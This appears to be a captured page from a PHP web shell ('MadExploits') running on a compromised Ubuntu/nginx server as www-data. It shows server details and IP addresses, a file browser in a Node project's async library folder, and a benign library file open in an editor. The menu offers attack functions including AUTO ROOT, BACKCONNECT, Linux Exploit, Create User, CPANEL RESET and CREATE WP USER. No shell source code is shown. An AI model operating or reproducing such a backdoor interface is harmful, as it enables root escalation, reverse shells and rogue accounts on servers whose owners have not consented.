Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
async /
internal /
[ HOME SHELL ]
Name
Size
Permission
Action
DoublyLinkedList.js
2.29
KB
-rw-r--r--
applyEach.js
1.03
KB
-rw-r--r--
breakLoop.js
226
B
-rw-r--r--
consoleFunc.js
1.2
KB
-rw-r--r--
createTester.js
1.25
KB
-rw-r--r--
doLimit.js
293
B
-rw-r--r--
doParallel.js
600
B
-rw-r--r--
doParallelLimit.js
653
B
-rw-r--r--
eachOfLimit.js
1.96
KB
-rw-r--r--
filter.js
2.12
KB
-rw-r--r--
findGetResult.js
200
B
-rw-r--r--
getIterator.js
307
B
-rw-r--r--
initialParams.js
514
B
-rw-r--r--
iterator.js
1.43
KB
-rw-r--r--
map.js
903
B
-rw-r--r--
notId.js
180
B
-rw-r--r--
once.js
312
B
-rw-r--r--
onlyOnce.js
361
B
-rw-r--r--
parallel.js
1.11
KB
-rw-r--r--
queue.js
5.64
KB
-rw-r--r--
reject.js
541
B
-rw-r--r--
setImmediate.js
1021
B
-rw-r--r--
slice.js
407
B
-rw-r--r--
withoutIndex.js
284
B
-rw-r--r--
wrapAsync.js
616
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : createTester.js
'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); exports.default = _createTester; var _noop = require('lodash/noop'); var _noop2 = _interopRequireDefault(_noop); var _breakLoop = require('./breakLoop'); var _breakLoop2 = _interopRequireDefault(_breakLoop); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } function _createTester(check, getResult) { return function (eachfn, arr, iteratee, cb) { cb = cb || _noop2.default; var testPassed = false; var testResult; eachfn(arr, function (value, _, callback) { iteratee(value, function (err, result) { if (err) { callback(err); } else if (check(result) && !testResult) { testPassed = true; testResult = getResult(true, value); callback(null, _breakLoop2.default); } else { callback(); } }); }, function (err) { if (err) { cb(err); } else { cb(null, testPassed ? testResult : getResult(false)); } }); }; } module.exports = exports['default'];
Close